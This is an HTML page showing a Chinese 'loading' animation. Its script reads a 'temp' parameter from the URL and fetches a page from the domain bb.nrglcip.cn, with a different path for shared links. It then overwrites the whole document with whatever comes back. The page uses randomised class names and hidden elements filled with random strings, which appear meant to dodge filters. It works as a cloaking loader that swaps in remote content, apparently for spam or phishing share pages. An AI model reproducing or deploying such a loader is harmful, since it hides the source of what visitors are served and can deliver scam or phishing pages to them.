<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZfKWzRa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZfKWzRa .ZoczARLjby {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZfKWzRa .content {
            line-height: 50px;
            text-align: center
        }

        .ZfKWzRa .img {
            width: 100%
        }

        .ZfKWzRa .dopAGQn {
            text-align: center
        }

        .ZfKWzRa .dopAGQn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZfKWzRa .dopAGQn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZfKWzRa .dopAGQn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZfKWzRa .dopAGQn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZfKWzRa .dopAGQn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZfKWzRa .dopAGQn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZfKWzRa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SXD63ryLQpZWI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hrHwi9 = SXD63ryLQpZWI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hrHwi9 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hrHwi9 +".html?a=share";
		}
		
        mnGa6M13bB=url+"#"+new Date().getTime();
        mnGa6M13bB && function() {
            $.get(mnGa6M13bB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >WQIsk1e2KvTiNbLMcaRP2QUbhpk6</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>tAyq5Wk23U8xncWO5JoR6Lai95Rwaug6TscF10hdz43gO8DTtIslROKzh</a>
<span style='display:none'>O4DvOhGsryqXNqcEI31k1fnih0jqGdNYfLiZM9WWFvhTeQYELzUpCzBqtdlDcnJsjqlzRuoxieCs</span>
<p  style='display:none'>ZVCo48JEAcWdRkwTAAxmtzD0tA</p>
<ul style='display:none' >O71cJN2dE1PFLVLwUAJeCyVA7MSzwjAapqtZADCAWrgVJxY</ul>
<p  style='display:none'>ZVCo48JEAcWdRkwTAAxmtzD0tA</p><div class="ZfKWzRa">
    <div class="ZoczARLjby">
        <div class="dopAGQn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>nG8GakKO1l2kBQOlPoFCd7TsbX4kDuy9i5CYbmMc2N9JjfiDmu4roVxy04e907vkj05Rds</div>
<img  src='' style='display:none'>
<ul style='display:none' >yYrgVqJAZXQ9otIPjlt1VUOApImQGcjnAxy8ATHSnbBumdKQnF9yJ7XLxrzaChlXtb6qzsWbjgipIzdg</ul>
<p  style='display:none'>Ds2pjtAtn8Nuw5Ww2WjgrkUZgo0krHkmGtf9uP17FzIcOAqU9avCRPcwY7qH8HFzm</p>
<span style='display:none'>BFEI9hfutM85LhxUAImoufvIrBvXFR</span>
<span style='display:none'>BFEI9hfutM85LhxUAImoufvIrBvXFR</span>
<div style='display:none'>nG8GakKO1l2kBQOlPoFCd7TsbX4kDuy9i5CYbmMc2N9JjfiDmu4roVxy04e907vkj05Rds</div>
<div style='display:none'>nG8GakKO1l2kBQOlPoFCd7TsbX4kDuy9i5CYbmMc2N9JjfiDmu4roVxy04e907vkj05Rds</div>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>L1BjoUINlwSLyCNsDg6Qq0Oc</a></body>
</html>